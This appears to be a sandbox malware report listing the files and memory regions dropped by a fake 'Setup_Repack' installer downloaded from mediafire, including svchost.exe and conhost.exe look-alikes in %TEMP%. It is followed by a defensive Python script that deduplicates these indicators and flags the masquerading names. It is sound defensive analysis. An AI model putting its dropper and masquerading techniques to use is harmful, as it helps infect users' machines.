C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\XR06EITC\www.mediafire[1].xml

MD5 01649b910c1b7e2f90c9aef58844f958
SHA1 33619ea74358f0aef3b90b0046c2fde5d24ac65b
SHA256 0c19622374c4960dea414c6a83b18aeeae150910bfc73ef21bca058d4d9d0c5b
SHA512 f2d7dd483039d14038cf472046d06d35407718088f7ec03c00ead15602b3c2d48bba263faf502350e74a4ce5e6ae4a40725a2af6a226b9ffa1b437c8890d377f

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\Setup_Repack[1].zip

MD5 b05c1d4d043e5735facba8e3880e8121
SHA1 07aa778d7adc6a50f8b6e987668ff015a82cc83a
SHA256 e68450073ee80ae8c9a57cec98f26632616e4f84b29712c99d5ed1b4b96dc7fd
SHA512 31bf0e9827b3e3caba45c4d6faba19f93cb1c65f0eedaf86979eb0014ca0b61dd1acc62d277f26d155018026ab4ebe93f0b4d636d60e8848884b3301ee02e994

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\XR06EITC\www.mediafire[1].xml

MD5 ae9f4ede7101b51cf0c64936dbda1e4b
SHA1 02f8908a1db3e0edc6408f7ffa907a62f390842d
SHA256 cfdff2d561c59a7aa95ce0b01cd14f147a59e2116f625fa68c968f0a2454199b
SHA512 311243a8f8bf78e1dca3d4719c17cb464f3d0a9efaa40273f9fd229086a0eac7505fd9757468407e9ea588c5e0802fba599ad35ed84ff4d532a555cdac7683be

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\XR06EITC\www.mediafire[1].xml

MD5 ceb594f1c72d6de253b1b0ffd35ceb52
SHA1 6d32374abb3930c57bfb837ac3844d6ec67a843d
SHA256 ff53160ac6b40b29987fb1cb01ab0bb6758c31bcc9dd33a71d3ae1c7e0338d02
SHA512 60bb873a5231d3631645b91dcfa26a50e8a5ceebd663062ee6db2b8a108d2256aa277ce11bd07763a11fbb9368244c626d491be5ac30baa2ac92aea91f612b03

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\XR06EITC\www.mediafire[1].xml

MD5 6bb983bf1f0a08dfb10c585fc626d95b
SHA1 481ca5f4129d45e49c06658b5d4a134bfd394808
SHA256 fab3ccaedc19da6202e26c9a447bc8f989b49a5d4f2f007cf543aa00e671ef76
SHA512 9aae2a0a30647c62623ec68e61e2e05686447aca9b66c412c9998aebea2198f7c87818e4f3f4643ef5f29e97a94f4c6a4a83e3d1db6577bbce80270aa68870b7

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LA8JCWVO\f[2].txt

MD5 dc00e1c539bb0dc7bcc40f80ff56eebf
SHA1 42a3f5626f0f7f8aaa7385d34285c80a005b11db
SHA256 a8441b850c7e2bfa72c090b01c2468fadb48dd4a71e97ae7b2f26f9ca238ae36
SHA512 328b6ca1c6f7f22b52c539cefb840804c0faffbb9be34bac3ef0f4e3d1c2c52d5a0117755c46d5f5053c2ce23ef462f1721bb9a858143916d80110c0f97a2743

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\0CN9UH4N\f[3].txt

MD5 e3ea43a1f51c81911fc3a2119d7f8d00
SHA1 f0b7e514e206509b1531f667aa48339cb6474760
SHA256 597e4ec7ca2b12f9150e02e04096849d6b06061b09c2d131f1d2225871eedfdf
SHA512 60707feb9dfaf1ee7d9675bd9f405d41ef973b2ede30da0a82dc19181a960e93b575b3580603f8b6549a9c2ad916d0de936922e1863f67dfe7f336d1bea5e6da

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LA8JCWVO\UFYwWwmt[1].js

MD5 6d642fb9210c854f39bcc68a59a5e337
SHA1 431343d8d505c98362d2208ff0534670ba24d2e0
SHA256 5056305b09ad6474ea540f796c79be51d6b8e96043cb3d7bc4ef774e56765f4f
SHA512 35f58eea4f49b05e15a1ba5f8544be1aafc9f709131d24fb01cbadf2f9f0dcc326021a361a5b7bb2064acdb9665c77dc3ab90d5ffe490cccf7b2c56e70d9dfb9

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\f[1].txt

MD5 43df87d5c0a3c601607609202103773a
SHA1 8273930ea19d679255e8f82a8c136f7d70b4aef2
SHA256 88a577b7767cbe34315ff67366be5530949df573931dd9c762c2c2e0434c5b8a
SHA512 2162ab9334deebd5579ae218e2a454dd7a3eef165ecdacc7c671e5aae51876f449de4ac290563ecc046657167671d4a9973c50d51f7faefc93499b8515992137

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\AI9PQGEV.cookie

MD5 550db96ca44651178e49716047c0cf13
SHA1 a1fd8f84730b2ecb44b5936188577447aac71190
SHA256 f2b058c0fac31783a52a4392ad6ea051f92d383341aa8ccc4aa49d0852e65c15
SHA512 9a4b86b7f818b90e342233ec521af2ace0644c188572dc49e459725af775d66ff8a4343881a38319ed9d98a9bfaa7d4b16e7af5c0218d847e627052b7ebf5ea5

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\Setup_Repack.zip.t2sbfdg.partial

MD5 7c033cb1fbee65d766ec58bb0903af1c
SHA1 d7ac98c071dd1e58b4c507ce872182c5e31d110a
SHA256 cb39ef698af54dd4d90ec8f37b7d133c971d1be1816880e78d39c2fbc1c4a612
SHA512 9e81d8db2a03d0f7b4bff7e135259bbe094bc706a1f61a03b868011edf7ca7fce9f08bb06f43a35f749d2111730750da9a8986d41f70ddfdbde6eca24bf5f783

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\Pug[1].gif

MD5 d89746888da2d9510b64a9f031eaecd5
SHA1 d5fceb6532643d0d84ffe09c40c481ecdf59e15a
SHA256 ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
SHA512 d5da26b5d496edb0221df1a4057a8b0285d15592a8f8dc7016a294df37ed335f3fde6a2252962e0df38b62847f8b771463a0124ef3f84299f262ed9d9d3cee4c

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\Setup_Repack.zip

MD5 7c033cb1fbee65d766ec58bb0903af1c
SHA1 d7ac98c071dd1e58b4c507ce872182c5e31d110a
SHA256 cb39ef698af54dd4d90ec8f37b7d133c971d1be1816880e78d39c2fbc1c4a612
SHA512 9e81d8db2a03d0f7b4bff7e135259bbe094bc706a1f61a03b868011edf7ca7fce9f08bb06f43a35f749d2111730750da9a8986d41f70ddfdbde6eca24bf5f783

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\M5B3R3IL\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBVN5MTE\container[1].htm

MD5 6aaaf8e11a32fd37fb419e3a4ce9696c
SHA1 1fd88f2ee4de5422e0c344debefe3f2b5abb2592
SHA256 468959e93f9b4e6f07c6a8f8d0e93d8fcb37d76a8615a93ec153f5842247ba99
SHA512 748b27bdb7c7fa082d7be6c69f56dc33302105784391320a5cf960531c594097bc406fd3f4690e4cf74f4016f4d56804a4296e9bd885562eb66699e1318f7000

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DFB02329A98458DFBF.TMP

MD5 cd6337e1f973ab5ac40d75126c186269
SHA1 74a03974266f2d73919ab0495ec0888384bca6ec
SHA256 2c94607e822098f1a2f6e8c00da3cc9273d71f31c982fe9d108e6a394666ad23
SHA512 799676cebadce910cd741888d62f0e55647735599ae72b81601e604903d9b373b114dc3d3ca33318dd75c4906587a5f5db4b577050fc16acfa416ae923a0bb11

C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe

MD5 550be4632970872fac54908f16920d66
SHA1 3289767c2de4e2cc55d4b7c1425b0b1a0fa28e20
SHA256 f10651c80d2acfe1b9b91fd9e550bf2b929307bf66ebc3d5be98fd53a1c978e9
SHA512 509ec5b1e500182de2a0c58b30925724f0e84d6d07d133b7d5e9e5ac2fbf9573a350349b794141b38908eb8622a08f938f198f1d3e5688ddc5c1d801d9053051

memory/4060-3559-0x0000000000400000-0x000000000043F000-memory.dmp

memory/4060-3564-0x0000000000510000-0x0000000000540000-memory.dmp

memory/4060-3566-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4060-3565-0x0000000002170000-0x0000000002176000-memory.dmp

memory/4060-3567-0x0000000004B50000-0x0000000004B60000-memory.dmp

memory/4060-3568-0x000000000A6A0000-0x000000000ACA6000-memory.dmp

memory/4060-3569-0x000000000C3C0000-0x000000000C4CA000-memory.dmp

memory/4060-3570-0x000000000C4F0000-0x000000000C502000-memory.dmp

memory/4060-3571-0x000000000C510000-0x000000000C54E000-memory.dmp

memory/4060-3572-0x000000000C6C0000-0x000000000C70B000-memory.dmp

C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\read me.txt

MD5 62e178b361f4075ed5c6fd6b628cd0c8
SHA1 f0246d6ddd9a14166b962d989f5679ed1ed484af
SHA256 cbec3b5cca68d031c59548fa8446cdefb193a6109f372f207b18852c284eed00
SHA512 711d362c08491efddc6f5c39f9101ae45e04fbbddd04f01c06bc6ebb419f7e43c30dd768d8970111e00e78b2086898a8faa49a4f886d5243c530ab1ee2ae27fb

memory/4060-3574-0x000000000AD30000-0x000000000ADA6000-memory.dmp

memory/4060-3575-0x000000000ADB0000-0x000000000AE42000-memory.dmp

memory/4060-3576-0x000000000D5D0000-0x000000000DACE000-memory.dmp

memory/4060-3577-0x000000000D010000-0x000000000D076000-memory.dmp

memory/4060-3578-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4060-3579-0x0000000004B50000-0x0000000004B60000-memory.dmp

memory/4060-3580-0x000000000DB30000-0x000000000DB80000-memory.dmp

memory/4060-3581-0x000000000DE40000-0x000000000E002000-memory.dmp

memory/4060-3582-0x000000000E010000-0x000000000E53C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 d076c4b5f5c42b44d583c534f78adbe7
SHA1 c35478e67d490145520be73277cd72cd4e837090
SHA256 2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512 b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

C:\Users\Admin\AppData\Local\Temp\conhost.exe

MD5 ecdb97e94c539f0be22aa0bd82739da1
SHA1 f913344f16eb5ca2b72c74efc349674945a1e400
SHA256 38e66e1c80433f2a4e16a708f8cb5e26ed32963f38664ffe398827271d7f41e6
SHA512 674dcb278af671c021943f4bbe8dcbe78308d0fd3f52a2b8b30bb8f9824e7a40cf54a9172411d2f94231dc51904c483be99feb66a7c473b0bac25de52ed794d6

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 7ec1a17851445d988ecce0997436b552
SHA1 eb1ce535aeb67b215cf82e4cce1eb669ad2c3f83
SHA256 169302e6a7a3c64a00b3fd84cbc0d6afed5add9bc192d51d76240836b1b7af14
SHA512 0d0bc0e4ddf08b104b2cd39c134d1215d4a20b51db253feb9d9b10315d228f02b4f281a277836f33abe62cb0c13c7e1c48c3defec519036e091609244fb806e9

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 1743d47645f5a5d479cbd1f387b09540
SHA1 49bea1153dbb495b424468ab0e2abac1dcdc8e22
SHA256 4a9ac2596a46eebc5494a2c4cf54727a3cddf634181581c8226ea7135803d052
SHA512 74a21633042fe888ce70f1b472522265a8e62595b50124bc4da47cb90012209218588b732e9d7eb81b03281acc895dd84321a51f5265f8e6c7ac483f64551a0a

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

memory/4104-3641-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4104-3642-0x0000000000270000-0x000000000027C000-memory.dmp

memory/4104-3643-0x0000000004D20000-0x0000000004D30000-memory.dmp

memory/4104-3646-0x0000000002570000-0x000000000257A000-memory.dmp

memory/4060-3647-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4984-3650-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4984-3651-0x0000000007080000-0x00000000070B6000-memory.dmp

memory/4984-3652-0x0000000007210000-0x0000000007220000-memory.dmp

memory/4984-3653-0x0000000007850000-0x0000000007E78000-memory.dmp

memory/4984-3654-0x0000000007F50000-0x0000000007F72000-memory.dmp

memory/4984-3655-0x00000000080F0000-0x0000000008156000-memory.dmp

memory/4984-3656-0x0000000008160000-0x00000000084B0000-memory.dmp

memory/4984-3657-0x0000000008080000-0x000000000809C000-memory.dmp

memory/4984-3658-0x0000000008980000-0x00000000089CB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lwtf2wg5.0x4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4984-3676-0x0000000009920000-0x0000000009953000-memory.dmp

memory/4984-3677-0x00000000096F0000-0x000000000970E000-memory.dmp

memory/4984-3682-0x0000000009960000-0x0000000009A05000-memory.dmp

memory/4984-3683-0x0000000009C40000-0x0000000009CD4000-memory.dmp

memory/4104-3684-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4984-3685-0x0000000007210000-0x0000000007220000-memory.dmp

memory/4104-3718-0x0000000004D20000-0x0000000004D30000-memory.dmp

memory/4984-3721-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4984-3880-0x00000000073F0000-0x000000000740A000-memory.dmp

memory/4984-3885-0x00000000073E0000-0x00000000073E8000-memory.dmp

memory/4984-3901-0x0000000072F90000-0x000000007367E000-memory.dmp

memory/4104-3910-0x0000000072F90000-0x000000007367E000-memory.dmp
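The dropped-file listing above carries more signal than a flat hash list shows: svchost.exe and conhost.exe written to C:\Users\Admin\AppData\Local\Temp carry system-binary names outside C:\Windows\System32 (masquerading), the same path and hash appears more than once, the __PSScriptPolicyTest_*.ps1 entry carries the hashes of the single byte "1" (the probe file PowerShell writes when it tests script policy, not an attacker script), and the memory/... lines encode PID and address range of each dumped region. The script below is an added example, not part of the sandbox report, that parses this listing format into file entries and memory regions, collapses repeated entries, and applies those three checks. The sample input is constructed from entries in the report (hashes copied, order chosen for the example); the set of system-binary names and the two trusted directories are editorial assumptions, not something the report states.

```python
import hashlib
import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed excerpt in the report's own listing format: a path line, a blank
# line, then MD5/SHA1/SHA256/SHA512 lines; memory regions are single
# "memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp" lines. Hash values are
# copied from the report; the ordering is constructed for this example.
SAMPLE_LISTING = r"""
C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 d076c4b5f5c42b44d583c534f78adbe7
SHA1 c35478e67d490145520be73277cd72cd4e837090
SHA256 2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512 b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 d076c4b5f5c42b44d583c534f78adbe7
SHA1 c35478e67d490145520be73277cd72cd4e837090
SHA256 2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8
SHA512 b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

memory/4060-3559-0x0000000000400000-0x000000000043F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lwtf2wg5.0x4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-f]{32,128})$")
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

# Assumption (editorial): these names are only legitimate in these directories.
SYSTEM_BINARIES = {"svchost.exe", "conhost.exe", "lsass.exe", "csrss.exe", "explorer.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


@dataclass
class FileEntry:
    path: str
    hashes: dict = field(default_factory=dict)


@dataclass
class MemRegion:
    pid: int
    start: int
    end: int


def parse_listing(text):
    """Split the listing into FileEntry objects (path plus hashes) and MemRegion objects."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            regions.append(MemRegion(int(m.group(1)), int(m.group(3), 16), int(m.group(4), 16)))
            current = None
            continue
        h = HASH_RE.match(line)
        if h and current is not None:
            current.hashes[h.group(1)] = h.group(2)
            continue
        current = FileEntry(line)  # any other non-empty line starts a new file entry
        files.append(current)
    return files, regions


def dedupe(files):
    """Collapse repeated (path, SHA256) pairs; the report lists some files more than once."""
    seen, unique = set(), []
    for f in files:
        key = (f.path.lower(), f.hashes.get("SHA256"))
        if key not in seen:
            seen.add(key)
            unique.append(f)
    return unique


def masquerading(files):
    """Paths whose basename is a system-binary name but whose directory is not a system directory."""
    return [f.path for f in files
            if ntpath.basename(f.path).lower() in SYSTEM_BINARIES
            and ntpath.dirname(f.path).lower() not in SYSTEM_DIRS]


def is_policy_test_stub(entry):
    """PowerShell's __PSScriptPolicyTest_*.ps1 probe contains the single byte '1';
    matching its SHA256 confirms the entry is that probe and not a real script."""
    return (ntpath.basename(entry.path).startswith("__PSScriptPolicyTest_")
            and entry.hashes.get("SHA256") == hashlib.sha256(b"1").hexdigest())


def regions_by_pid(regions):
    """Group dumped regions as (start, size) per PID, e.g. 0x400000 in PID 4060 is a classic image base."""
    out = defaultdict(list)
    for r in regions:
        out[r.pid].append((r.start, r.end - r.start))
    return dict(out)


def triage(text):
    files, regions = parse_listing(text)
    unique = dedupe(files)
    return {
        "unique_files": unique,
        "masquerading": masquerading(unique),
        "policy_stubs": [f.path for f in unique if is_policy_test_stub(f)],
        "regions": regions_by_pid(regions),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_LISTING)
    print(len(result["unique_files"]), "unique files")
    print("masquerading:", result["masquerading"])
    print("policy stubs:", result["policy_stubs"])
    print("regions:", result["regions"])
```

Running triage over the full Files section instead of the excerpt gives a deduplicated IOC list in which the two %TEMP% system-binary look-alikes are the entries to block and hunt for, while the policy probe can be dropped from the IOC set rather than shipped as if it were a malicious script.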